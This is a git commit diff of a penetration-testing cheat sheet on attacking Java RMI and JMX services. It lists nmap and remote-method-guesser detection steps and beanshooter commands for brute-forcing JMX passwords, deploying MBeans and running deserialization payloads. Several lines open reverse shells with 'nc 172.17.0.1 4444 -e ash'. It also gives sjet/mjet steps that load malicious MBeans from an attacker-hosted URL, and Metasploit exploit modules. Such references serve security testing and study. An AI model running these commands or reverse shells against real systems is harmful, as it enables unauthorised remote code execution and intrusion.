Java beanshooter

This commit is contained in:
Swissky 2023-10-15 19:31:16 +02:00
parent eebea7cb4d
commit 4b6db7b471

View File

@ -1,82 +1,101 @@
# Java RMI # Java RMI
> Exposing a weak configured Java Remote Method Invocation (RMI) service can lead to several ways to achieve RCE. > Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing.
> One such attack is to host an MLet file and instruct the JMX service to load MBeans from the remote host which can be carried out
> using the tools mjet or sjet. remote-method-guesser is a more recent tool which bundles enumeration of RMI services together
> with a summary of currently known attack techniques.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Detection](#detection) * [Detection](#detection)
* [Exploitation](#exploitation) * [Exploitation](#exploitation)
* [RCE using beanshooter](#rce-using-beanshooter)
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet) * [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
* [RCE using Metasploit](#rce-using-metasploit)
* [References](#references) * [References](#references)
## Tools ## Tools
- [sjet](https://github.com/siberas/sjet) - [siberas/sjet](https://github.com/siberas/sjet)
- [mjet](https://github.com/mogwailabs/mjet) - [mogwailabs/mjet](https://github.com/mogwailabs/mjet)
- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) - [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
- [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
## Detection ## Detection
Using [nmap](https://nmap.org/): * Using [nmap](https://nmap.org/):
```powershell ```powershell
$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
1089/tcp open java-rmi Java RMI 1089/tcp open java-rmi Java RMI
| rmi-vuln-classloader: | rmi-vuln-classloader:
| VULNERABLE: | VULNERABLE:
| RMI registry default configuration remote code execution vulnerability | RMI registry default configuration remote code execution vulnerability
| State: VULNERABLE | State: VULNERABLE
| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. | Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
| rmi-dumpregistry: | rmi-dumpregistry:
| jmxrmi | jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub | javax.management.remote.rmi.RMIServerImpl_Stub
``` ```
Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser): * Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
```bash ```bash
$ rmg scan 172.17.0.2 --ports 0-65535 $ rmg scan 172.17.0.2 --ports 0-65535
[+] Scanning 6225 Ports on 172.17.0.2 for RMI services. [+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
[+] [+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC)
[+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC) [+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC)
[+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC) [+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC)
[+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC) [+] [6234 / 6234] [#############################] 100%
[+] [6234 / 6234] [#############################] 100% [+] Portscan finished.
[+]
[+] Portscan finished.
```
```bash $ rmg enum 172.17.0.2 9010
$ rmg enum 172.17.0.2 9010 [+] RMI registry bound names:
[+] RMI registry bound names: [+]
[+] [+] - plain-server2
[+] - plain-server2 [+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711] [+] - legacy-service
[+] - legacy-service [+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309] [+] - plain-server
[+] - plain-server [+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]
[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813] [...]
[...] ```
```
Using Metasploit * Using Metasploit
```bash ```bash
use auxiliary/scanner/misc/java_rmi_server use auxiliary/scanner/misc/java_rmi_server
set RHOSTS <IPs> set RHOSTS <IPs>
set RPORT <PORT> set RPORT <PORT>
run run
``` ```
## Exploitation ## Exploitation
If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.
### RCE using beanshooter
* List available attributes: `beanshooter info 172.17.0.2 9010`
* Display value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose`
* Set the value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean`
* Bruteforce a password protected JMX service: `beanshooter brute 172.17.0.2 1090`
* List registered MBeans: `beanshooter list 172.17.0.2 9010`
* Deploy an MBean: `beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000`
* Enumerate JMX endpoint: `beanshooter enum 172.17.0.2 1090`
* Invoke method on a JMX endpoint: `beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'`
* Invoke arbitrary public and static Java methods:
```ps1
beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
```
* Standard MBean execution: `beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'`
* Deserialization attacks on a JMX endpoint: `beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin`
### RCE using sjet or mjet ### RCE using sjet or mjet
#### Requirements #### Requirements
- Jython - Jython
- The JMX server can connect to a http service that is controlled by the attacker - The JMX server can connect to a http service that is controlled by the attacker
- JMX authentication is not enabled - JMX authentication is not enabled
@ -85,12 +104,12 @@ run
The attack involves the following steps: The attack involves the following steps:
* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans * Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
* Creating a instance of the MBean javax.management.loading.MLet on the target server, using JMX * Creating a instance of the MBean `javax.management.loading.MLet` on the target server, using JMX
* Invoking the "getMBeansFromURL" method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file. * Invoking the `getMBeansFromURL` method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file.
* The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX. * The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX.
* The attacker finally invokes methods from the malicious MBean. * The attacker finally invokes methods from the malicious MBean.
Exploit the JMX using [sjet](https://github.com/siberas/sjet) or [mjet](https://github.com/mogwailabs/mjet) Exploit the JMX using [siberas/sjet](https://github.com/siberas/sjet) or [mogwailabs/mjet](https://github.com/mogwailabs/mjet)
```powershell ```powershell
jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000 jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
@ -106,6 +125,7 @@ jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
``` ```
### RCE using Metasploit ### RCE using Metasploit
```bash ```bash
use exploit/multi/misc/java_rmi_server use exploit/multi/misc/java_rmi_server
set RHOSTS <IPs> set RHOSTS <IPs>